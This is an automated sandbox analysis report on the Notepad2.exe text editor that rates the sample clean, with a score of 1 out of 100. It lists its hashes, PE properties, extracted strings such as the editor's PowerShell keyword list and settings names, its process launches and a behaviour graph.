Windows Analysis Report Notepad2.exe

Overview

General Information

Sample Name: Notepad2.exe
Analysis ID: 435307
MD5: f6d48867d815d6322199e90aa71a8c69
SHA1: f8f9c191d37b643a20870ab8d0af39780c4677ff
SHA256: c6086336a827a9852ee5cf6f46ffb7b1fccf82f194132a0c8a217d1240654f9f
Infos:

Most interesting Screenshot:

Detection

Score: 1
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

PE file contains strange resources
Sample file is different than original file name gathered from version info

Classification

Source: Notepad2.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.ch
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.ch.JNo
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.chFlorian
Source: Notepad2.exe String found in binary or memory: http://www.flos-freeware.chflorian.balmer

System Summary:

barindex
PE file contains strange resources
Source: Notepad2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Notepad2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Notepad2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Notepad2.exe Binary or memory string: OriginalFilename vs Notepad2.exe
Source: Notepad2.exe, 00000000.00000002.942380607.00000000047B0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Notepad2.exe
Source: Notepad2.exe, 00000000.00000002.942380607.00000000047B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Notepad2.exe
Source: Notepad2.exe, 00000003.00000002.942249073.00000000047F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Notepad2.exe
Source: Notepad2.exe, 00000003.00000002.942249073.00000000047F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Notepad2.exe
Source: Notepad2.exe, 00000005.00000002.934686132.0000000002F30000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Notepad2.exe
Source: Notepad2.exe, 00000005.00000002.934686132.0000000002F30000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Notepad2.exe
Source: classification engine Classification label: clean1.winEXE@3/0@0/0
Source: Notepad2.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Notepad2.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Notepad2.exe String found in binary or memory: et-event get-eventlog get-eventsubscriber get-executionpolicy get-formatdata get-help get-history get-host get-hotfix get-item get-itemproperty get-job get-location get-member get-module get-pfxcertificate get-process get-psbreakpoint get-pscallstack get-psdri
Source: Notepad2.exe String found in binary or memory: add-computer add-content add-history add-member add-pssnapin add-type checkpoint-computer clear-content clear-eventlog clear-history clear-host clear-item clear-itemproperty clear-variable compare-object complete-transaction connect-wsman convertfrom-csv convertfrom-securestring convertfrom-stringdata convert-path convertto-csv convertto-html convertto-securestring convertto-xml copy-item copy-itemproperty debug-process disable-computerrestore disable-psbreakpoint disable-psremoting disable-pssessionconfiguration disable-wsmancredssp disconnect-wsman enable-computerrestore enable-psbreakpoint enable-psremoting enable-pssessionconfiguration enable-wsmancredssp enter-pssession exit-pssession export-alias export-clixml export-console export-counter export-csv export-formatdata export-modulemember export-pssession foreach-object format-custom format-list format-table format-wide get-acl get-alias get-authenticodesignature get-childitem get-command get-computerrestorepoint get-content get-counter get-credential get-culture get-date get-event get-eventlog get-eventsubscriber get-executionpolicy get-formatdata get-help get-history get-host get-hotfix get-item get-itemproperty get-job get-location get-member get-module get-pfxcertificate get-process get-psbreakpoint get-pscallstack get-psdrive get-psprovider get-pssession get-pssessionconfiguration get-pssnapin get-random get-service get-tracesource get-transaction get-uiculture get-unique get-variable get-verb get-winevent get-wmiobject get-wsmancredssp get-wsmaninstance group-object import-alias import-clixml import-counter import-csv import-localizeddata import-module import-pssession invoke-command invoke-expression invoke-history invoke-item invoke-wmimethod invoke-wsmanaction join-path limit-eventlog measure-command measure-object move-item move-itemproperty new-alias new-event new-eventlog new-item new-itemproperty new-module new-modulemanifest new-object new-psdrive new-pssession new-pssessionoption new-service new-timespan new-variable new-webserviceproxy new-wsmaninstance new-wsmansessionoption out-default out-file out-gridview out-host out-null out-printer out-string pop-location push-location read-host receive-job register-engineevent register-objectevent register-pssessionconfiguration register-wmievent remove-computer remove-event remove-eventlog remove-item remove-itemproperty remove-job remove-module remove-psbreakpoint remove-psdrive remove-pssession remove-pssnapin remove-variable remove-wmiobject remove-wsmaninstance rename-item rename-itemproperty reset-computermachinepassword resolve-path restart-computer restart-service restore-computer resume-service select-object select-string select-xml send-mailmessage set-acl set-alias set-authenticodesignature set-content set-date set-executionpolicy set-item set-itemproperty set-location set-psbreakpoint set-psdebug set-pssessionconfiguration set-service set-strictmode set-tracesource set-variable set-wmiinstance set-wsmaninstance set-wsmanqu
Source: unknown Process created: C:\Users\user\Desktop\Notepad2.exe 'C:\Users\user\Desktop\Notepad2.exe' -install
Source: unknown Process created: C:\Users\user\Desktop\Notepad2.exe 'C:\Users\user\Desktop\Notepad2.exe' /install
Source: unknown Process created: C:\Users\user\Desktop\Notepad2.exe 'C:\Users\user\Desktop\Notepad2.exe' /load
Source: C:\Users\user\Desktop\Notepad2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32 Jump to behavior
Source: Notepad2.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Notepad2.exe Static PE information: section name: RT_CURSOR
Source: Notepad2.exe Static PE information: section name: RT_BITMAP
Source: Notepad2.exe Static PE information: section name: RT_ICON
Source: Notepad2.exe Static PE information: section name: RT_MENU
Source: Notepad2.exe Static PE information: section name: RT_DIALOG
Source: Notepad2.exe Static PE information: section name: RT_STRING
Source: Notepad2.exe Static PE information: section name: RT_ACCELERATOR
Source: Notepad2.exe Static PE information: section name: RT_GROUP_ICON
Source: Notepad2.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Notepad2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: Notepad2.exe, 00000000.00000002.934516142.0000000001300000.00000002.00000001.sdmp, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Notepad2.exe, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Notepad2.exe, 00000000.00000002.934516142.0000000001300000.00000002.00000001.sdmp, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Notepad2.exe Binary or memory string: * - =%s=%sIsAppThemedSetCurrentProcessExplicitAppUserModelIDshell32.dll(default)OpacityLevelSetLayeredWindowAttributesUser32ResizeDlg%CSIDL:MYDOCUMENTS%-n .lnk%.2iCloseThemeDataGetThemeSysFontWINDOWSTYLE;WINDOWOpenThemeDatauxtheme.dllTrayNotifyWndShell_TrayWnd] [%i ToolbarReBarWindow32%02iToolbar LabelsToolbarWindow32OVRCR+LFUnicode BE BOM9'999'999 BytesLn 9'999'999 : 9'999'999 Col 9'999'999 : 999 Sel 9'999'999StickyWindowPositionSingleFileInstanceReuseWindowWindow%ix%i Maximized%ix%i SizeY%ix%i SizeX%ix%i PosY%ix%i PosXBitmapDisabledBitmapHotBitmapDefaultToolbar ImagesAutoReloadTimeoutFileCheckInvervalFileDlgFiltersDefaultDirectory ."DefaultExtensiontxtFindReplaceDlgPosYFindReplaceDlgPosXFavoritesDlgSizeYFavoritesDlgSizeXOpenWithDlgSizeYOpenWithDlgSizeXFileMRUDlgSizeYFileMRUDlgSizeXRecodeDlgSizeYRecodeDlgSizeXEncodingDlgSizeYEncodingDlgSizeXShowStatusbarShowToolbarToolbarButtonsTransparentModeMinimizeToTrayAlwaysOnTopEscFunctionResetFileWatchingFileWatchingModeSaveBeforeRunningToolsPrintMarginBottomPrintMarginRightPrintMarginTopPrintMarginLeftPrintZoomPrintColorModePrintFooterPrintHeaderFixTrailingBlanksFixLineEndingsDefaultEOLModeNoEncodingTagsLoadASCIIasUTF8SkipUnicodeDetectionDefaultEncodingViewEOLsViewWhiteSpaceShowLineNumbersShowSelectionMarginLongLineModeLongLinesLimitMarkLongLinesIndentWidthTabWidthBackspaceUnindentsTabIndentsTabsAsSpacesShowIndentGuidesAutoIndentHighlightCurrentLineAutoCloseTagsMatchBracesShowWordWrapSymbolsWordWrapSymbolsWordWrapIndentWordWrapModeWordWrapPathNameFormatFavoritesOpenWithDirNoFindWrapCloseReplaceCloseFindSaveFindReplaceSaveRecentFilesSaveSettingsSettings "%i,%i,%i,%i,%iPOSFLTRBMPOS:%i,%i*?sysmru=appid=CRLFCRLFUTF-8-SIGNATUREUTF8-SIGNATUREUTF-8SIGNATUREUTF8SIGNATUREUTF-8SIGUTF8SIGUTF-8UTF8UNICODE-BEUNICODEBEWUNICODEMBCSAANSI-/-+ShellUseSystemMRUShellAppUserModelIDNoFileVariablesNoCGIGuessNoHTMLGuessSimpleIndentGuidesToolbarLookNoFadeHiddenPortableMyDocsRelativeFileMRUMultiFileArgNotepad2Notepad2.ini.ini
Source: Notepad2.exe, 00000000.00000002.934516142.0000000001300000.00000002.00000001.sdmp, Notepad2.exe, 00000003.00000002.934520969.0000000001360000.00000002.00000001.sdmp, Notepad2.exe, 00000005.00000002.934520681.0000000001A20000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Notepad2.exe Code function: 0_2_00007FF76B5FAA98 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00007FF76B5FAA98
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 435307 Sample: Notepad2.exe Startdate: 16/06/2021 Architecture: WINDOWS Score: 1 4 Notepad2.exe 2 2->4         started        6 Notepad2.exe 2 2->6         started        8 Notepad2.exe 2 2->8         started       
No contacted IP infos